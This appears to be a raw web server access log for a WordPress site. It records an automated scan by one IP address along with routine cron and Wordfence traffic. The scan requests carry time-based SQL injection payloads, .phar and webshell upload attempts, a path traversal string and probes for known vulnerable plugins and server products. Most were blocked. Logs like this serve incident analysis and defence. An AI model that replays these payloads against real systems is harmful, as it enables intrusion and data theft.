165.232.54.158 - - [13/Jan/2026:20:16:12 +0800] "GET /elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name=38Btk7ouaFN2rdwaraNxxwsiUTs.phar HTTP/1.1" 404 10888 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0"
103.4.122.14 - - [13/Jan/2026:20:16:27 +0800] "POST /wp-cron.php?doing_wp_cron=1768306587.2824048995971679687500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:20:16:24 +0800] "GET /elFinder/files/38Btk7ouaFN2rdwaraNxxwsiUTs.phar HTTP/1.1" 404 10857 "-" "Mozilla/5.0 Macintosh Intel Mac OS X 10_15_7 AppleWebKit/605.1.15 KHTML like Gecko Version/18.4 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:20:16:56 +0800] "POST /wp-cron.php?doing_wp_cron=1768306616.3165071010589599609375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:20:16:53 +0800] "POST /wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1" 400 21 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:129.0) Gecko/20100101 Firefox/129.0"
165.232.54.158 - - [13/Jan/2026:20:17:51 +0800] "POST /wp-comments-post.php HTTP/1.1" 403 6627 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:20:17:56 +0800] "GET /wp-content/plugins/imagements/images/38btk4ezd45weynrjct5a76somk.php HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:20:21:38 +0800] "POST /wp-admin/admin-ajax.php?action=uploadFontIcon HTTP/1.1" 403 6628 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:20:21:44 +0800] "GET /wp-content/uploads/kaswara/fonts_icon/ytcakl/ue.php HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:20:22:28 +0800] "POST /%7B%7Bpath%7D%7D/?key=%3Ca%3E HTTP/1.1" 403 6627 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:20:23:05 +0800] "POST /wp-cron.php?doing_wp_cron=1768306985.2055358886718750000000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:20:23:03 +0800] "POST /?wordfence_syncAttackData=1768306983.5821 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:20:23:01 +0800] "GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0"
165.232.54.158 - - [13/Jan/2026:20:23:09 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:20:23:10 +0800] "GET /wp-admin/admin.php?page=wps_pages_page&ID=0+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))test)&type=home HTTP/1.1" 403 6627 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0"
165.232.54.158 - - [13/Jan/2026:20:23:14 +0800] "GET /wp-content/uploads/workreap-temp/38BtjyT7y5Bnb3PFMaESJEWkIlW.php HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0"
165.232.54.158 - - [13/Jan/2026:20:27:26 +0800] "POST /wp-json/pie/v1/login HTTP/1.1" 403 6627 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
165.232.54.158 - - [13/Jan/2026:20:27:54 +0800] "GET /wp-admin/admin-ajax.php?action=get_question&question_id=1%20AND%20(SELECT%207242%20FROM%20(SELECT(SLEEP(7)))HQYx) HTTP/1.1" 403 6627 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0"
165.232.54.158 - - [13/Jan/2026:20:29:16 +0800] "GET /forum/?subscribe_topic=1%20union%20select%201%20and%20sleep(6) HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0"
165.232.54.158 - - [13/Jan/2026:20:29:27 +0800] "POST /wp-admin/admin.php?page=contest-gallery/index.php&users_management=true&option_id=1 HTTP/1.1" 403 6627 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:132.0) Gecko/20100101 Firefox/132.0"
103.4.122.14 - - [13/Jan/2026:20:29:32 +0800] "POST /wp-cron.php?doing_wp_cron=1768307372.1734778881072998046875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:20:29:30 +0800] "POST /?wordfence_syncAttackData=1768307370.4887 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:20:29:28 +0800] "GET /wp-content/plugins/wc-multivendor-marketplace/readme.txt HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:20:30:06 +0800] "GET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)%20AND%20(SELECT%205921%20FROM%20(SELECT(SLEEP(6)))LxjM)%20AND%20(7754=775&type=json HTTP/1.1" 403 6627 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0"
165.232.54.158 - - [13/Jan/2026:20:30:56 +0800] "GET /wp-admin/admin-ajax.php?action=mec_load_single_page&time=1))%20UNION%20SELECT%20sleep(6)%20--%20g HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:109.0) Gecko/20100101 Firefox/115.0"
165.232.54.158 - - [13/Jan/2026:20:30:57 +0800] "POST /wp-admin/admin-ajax.php?action=rtec_send_unregister_link HTTP/1.1" 403 6627 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
181.214.165.159 - - [13/Jan/2026:20:33:58 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
103.4.122.14 - - [13/Jan/2026:20:36:29 +0800] "POST /wp-cron.php?doing_wp_cron=1768307789.0789649486541748046875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:20:36:27 +0800] "POST /?wordfence_syncAttackData=1768307787.5463 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:20:36:25 +0800] "GET /wp-content/plugins/pie-register/readme.txt HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:20:36:38 +0800] "POST /wp-cron.php?doing_wp_cron=1768307797.9951369762420654296875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:20:36:35 +0800] "POST /login/ HTTP/1.1" 302 - "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0"
103.4.122.14 - - [13/Jan/2026:20:36:45 +0800] "POST /wp-cron.php?doing_wp_cron=1768307805.3449950218200683593750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:20:36:43 +0800] "GET /wp-admin/profile.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:20:39:31 +0800] "POST /wp-cron.php?doing_wp_cron=1768307971.4344470500946044921875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
91.185.191.211 - - [13/Jan/2026:20:39:27 +0800] "POST /wp-login.php HTTP/1.1" 503 7314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0"
165.232.54.158 - - [13/Jan/2026:20:39:56 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 6628 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:20:40:42 +0800] "POST /wp-cron.php?doing_wp_cron=1768308042.0863499641418457031250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:20:40:40 +0800] "POST /?wordfence_syncAttackData=1768308040.5234 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:20:40:38 +0800] "POST /run HTTP/1.1" 404 10864 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0"
103.4.122.14 - - [13/Jan/2026:20:42:27 +0800] "POST /wp-cron.php?doing_wp_cron=1768308147.1700479984283447265625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:20:42:25 +0800] "POST /?wordfence_syncAttackData=1768308145.5616 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:20:42:23 +0800] "POST /wp-admin/admin.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Safari/108.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:20:42:40 +0800] "POST /AurallRECMonitor/services/svc-login.php HTTP/1.1" 403 6627 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:20:42:46 +0800] "POST /wp-cron.php?doing_wp_cron=1768308166.6407001018524169921875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:20:42:45 +0800] "POST /?wordfence_syncAttackData=1768308165.1992 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:20:42:43 +0800] "POST /druid/indexer/v1/sampler HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3.2 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:20:43:03 +0800] "POST /wp-cron.php?doing_wp_cron=1768308182.9827229976654052734375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:20:43:00 +0800] "GET /dav/server.php/files/personal/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data/settings/settings.xml HTTP/1.1" 301 - "-" "Mozilla/5.0 (CentOS; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0"
103.4.122.14 - - [13/Jan/2026:20:43:31 +0800] "POST /wp-cron.php?doing_wp_cron=1768308211.5496649742126464843750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:20:43:28 +0800] "POST /webtools/control/SOAPService HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:20:43:53 +0800] "POST /wp-cron.php?doing_wp_cron=1768308233.4845321178436279296875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:20:43:50 +0800] "GET /misc.php?action=showpopups&type=friend HTTP/1.1" 404 10881 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0"
165.232.54.158 - - [13/Jan/2026:20:44:03 +0800] "POST /admin/ HTTP/1.1" 403 6626 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0"
103.4.122.14 - - [13/Jan/2026:20:44:27 +0800] "POST /wp-cron.php?doing_wp_cron=1768308267.0978450775146484375000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:20:44:25 +0800] "POST /?wordfence_syncAttackData=1768308265.5326 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:20:44:23 +0800] "GET /owa/auth/x.js HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
165.232.54.158 - - [13/Jan/2026:20:46:00 +0800] "POST /users/user-dark-features HTTP/1.1" 404 10869 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/536.26.17 (KHTML, like Gecko) Version/6.0.2 Safari/536.26.17"
165.232.54.158 - - [13/Jan/2026:20:46:00 +0800] "POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1" 404 10874 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:20:46:00 +0800] "POST /wiki/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:20:46:00 +0800] "POST /pages/createpage-entervariables.action HTTP/1.1" 404 10874 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:20:46:00 +0800] "POST /wiki/pages/createpage-entervariables.action HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:20:46:00 +0800] "POST /confluence/pages/createpage-entervariables.action HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:20:46:00 +0800] "POST /pages/createpage.action?spaceKey=myproj HTTP/1.1" 404 10868 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0"
165.232.54.158 - - [13/Jan/2026:20:46:00 +0800] "POST /confluence/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:20:46:00 +0800] "POST /pages/createpage-entervariables.action HTTP/1.1" 404 10874 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:20:46:00 +0800] "POST /template/custom/content-editor HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:133.0) Gecko/20100101 Firefox/133.0"
103.4.122.14 - - [13/Jan/2026:20:46:03 +0800] "POST /wp-cron.php?doing_wp_cron=1768308363.6808741092681884765625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:20:46:00 +0800] "POST /pages/templates2/viewpagetemplate.action HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0"
165.232.54.158 - - [13/Jan/2026:20:46:00 +0800] "POST /pages/doenterpagevariables.action HTTP/1.1" 404 10873 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362"
165.232.54.158 - - [13/Jan/2026:20:46:00 +0800] "POST /templates/editor-preload-container HTTP/1.1" 404 10868 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0"
103.4.122.14 - - [13/Jan/2026:20:46:14 +0800] "POST /wp-cron.php?doing_wp_cron=1768308374.7278139591217041015625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:20:46:12 +0800] "POST /templates/editor-preload-container HTTP/1.1" 404 10868 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0"
165.232.54.158 - - [13/Jan/2026:20:46:19 +0800] "GET /?rest_route=/pmpro/v1/checkout_level&level_id=3&discount_code=%27%20%20union%20select%20sleep(6)%20--%20g HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:20:46:27 +0800] "POST /wp-cron.php?doing_wp_cron=1768308387.2537899017333984375000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:20:46:24 +0800] "GET /wp-content/plugins/paid-memberships-pro/js/pmpro-checkout.js HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0"
103.4.122.14 - - [13/Jan/2026:20:47:10 +0800] "POST /wp-cron.php?doing_wp_cron=1768308430.5458309650421142578125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:20:47:07 +0800] "GET /nagiosxi/login.php HTTP/1.1" 404 10863 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:20:47:44 +0800] "GET /nagiosxi/login.php HTTP/1.1" 404 10863 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:20:47:47 +0800] "POST /wp-cron.php?doing_wp_cron=1768308467.4923439025878906250000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:20:47:44 +0800] "GET /nagiosxi/login.php HTTP/1.1" 404 10863 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:109.0) Gecko/20100101 Firefox/115.0"
165.232.54.158 - - [13/Jan/2026:20:48:22 +0800] "POST /contactus.php HTTP/1.1" 403 6628 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:20:48:39 +0800] "POST /contactus.php HTTP/1.1" 403 6628 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0"
165.232.54.158 - - [13/Jan/2026:20:49:13 +0800] "GET /wp-content/plugins/wpcargo/includes/38BtjyLUsfy4CuNe4yNYBH4wAxi.php HTTP/1.1" 403 199 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:20:49:18 +0800] "GET /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath=38BtjyLUsfy4CuNe4yNYBH4wAxi.php HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/601.4.4 (KHTML, like Gecko) Version/9.0.3 Safari/537.86.4"
165.232.54.158 - - [13/Jan/2026:20:49:23 +0800] "POST /wp-content/plugins/wpcargo/includes/38BtjyLUsfy4CuNe4yNYBH4wAxi.php?1=var_dump HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:20:55:22 +0800] "POST /contactus.php HTTP/1.1" 403 6628 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:20:56:17 +0800] "POST /contactus.php HTTP/1.1" 403 6627 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:20:58:10 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:20:58:13 +0800] "POST /wp-cron.php?doing_wp_cron=1768309093.6461029052734375000000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:20:58:12 +0800] "POST /?wordfence_syncAttackData=1768309091.9557 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:20:58:09 +0800] "POST /api/snapshots HTTP/1.1" 404 10865 "-" "Mozilla/5.0 (Debian; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0"
103.4.122.14 - - [13/Jan/2026:20:58:19 +0800] "POST /wp-cron.php?doing_wp_cron=1768309098.9606499671936035156250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:20:58:17 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 21 "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:20:58:32 +0800] "POST /wp-cron.php?doing_wp_cron=1768309112.5234050750732421875000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:20:58:29 +0800] "POST /fpui/loginServlet HTTP/1.1" 404 10865 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0"
103.4.122.14 - - [13/Jan/2026:20:58:40 +0800] "POST /wp-cron.php?doing_wp_cron=1768309120.5167040824890136718750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:20:58:37 +0800] "POST /lumis/portal/controller/xml/PageControllerXml.jsp HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:20:59:29 +0800] "POST /wp-cron.php?doing_wp_cron=1768309169.0503070354461669921875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:20:59:25 +0800] "POST /Config/SaveUploadedHotspotLogoFile HTTP/1.1" 404 10875 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:21:01:45 +0800] "POST /wp-cron.php?doing_wp_cron=1768309305.9209160804748535156250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:01:42 +0800] "POST /cgi-bin/backup/hbs_mgnt.cgi HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Debian; Linux i686; rv:133.0) Gecko/20100101 Firefox/133.0"
103.4.122.14 - - [13/Jan/2026:21:01:49 +0800] "POST /wp-cron.php?doing_wp_cron=1768309309.4428799152374267578125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:01:46 +0800] "GET /assets/app/something/services/AppModule.class/ HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0"
103.4.122.14 - - [13/Jan/2026:21:02:22 +0800] "POST /wp-cron.php?doing_wp_cron=1768309342.5556108951568603515625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:02:19 +0800] "POST /webtools/control/SOAPService HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:21:02:31 +0800] "POST /wp-cron.php?doing_wp_cron=1768309351.4762940406799316406250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:02:28 +0800] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:130.0) Gecko/20100101 Firefox/130.0"
103.4.122.14 - - [13/Jan/2026:21:05:51 +0800] "POST /wp-cron.php?doing_wp_cron=1768309551.8523709774017333984375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:05:48 +0800] "POST / HTTP/1.1" 200 16322 "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Safari/112.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:21:05:57 +0800] "POST /wp-cron.php?doing_wp_cron=1768309557.3244209289550781250000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:05:54 +0800] "POST /tools.cgi HTTP/1.1" 404 10868 "https://nutritaste.com.au/tools.cgi" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:21:06:03 +0800] "POST /wp-cron.php?doing_wp_cron=1768309563.3242809772491455078125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:06:00 +0800] "POST /tools.cgi HTTP/1.1" 404 10868 "https://nutritaste.com.au/tools.cgi" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:21:06:11 +0800] "POST /wp-cron.php?doing_wp_cron=1768309571.2816751003265380859375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:06:08 +0800] "POST /webtools/control/SOAPService HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:21:06:45 +0800] "POST /wp-cron.php?doing_wp_cron=1768309605.6647570133209228515625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:21:06:42 +0800] "GET /dl.asp HTTP/1.1" 404 10865 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/536.26.17 (KHTML, like Gecko) Version/6.0.2 Safari/536.26.17"
